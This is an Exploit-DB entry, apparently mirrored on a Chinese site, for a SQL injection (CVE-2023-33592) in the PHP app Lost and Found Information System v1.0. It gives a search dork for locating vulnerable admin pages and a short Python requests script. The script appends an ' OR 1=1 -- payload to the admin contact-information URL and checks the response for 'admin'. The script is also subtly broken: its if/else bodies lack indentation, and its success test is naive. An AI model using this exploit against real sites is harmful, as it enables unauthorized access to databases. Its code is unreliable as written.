Lost and Found Information System v1.0 – SQL Injection

• Exploit Database
• 17 阅读

• 作者： Amirhossein Bahramizadeh
  日期： 2023-07-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51570/

• # Exploit Title: Lost and Found Information System v1.0 - SQL Injection
  # Date: 2023-06-30
  # country: Iran
  # Exploit Author: Amirhossein Bahramizadeh
  # Category : webapps
  # Dork : /php-lfis/admin/?page=system_info/contact_information
  # Tested on: Windows/Linux
  # CVE : CVE-2023-33592
  import requests
  
  # URL of the vulnerable component
  url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"
  
  # Injecting a SQL query to exploit the vulnerability
  payload = "' OR 1=1 -- "
  
  # Send the request with the injected payload
  response = requests.get(url + payload)
  
  # Check if the SQL injection was successful
  if "admin" in response.text:
  print("SQL injection successful!")
  else:
  print("SQL injection failed.")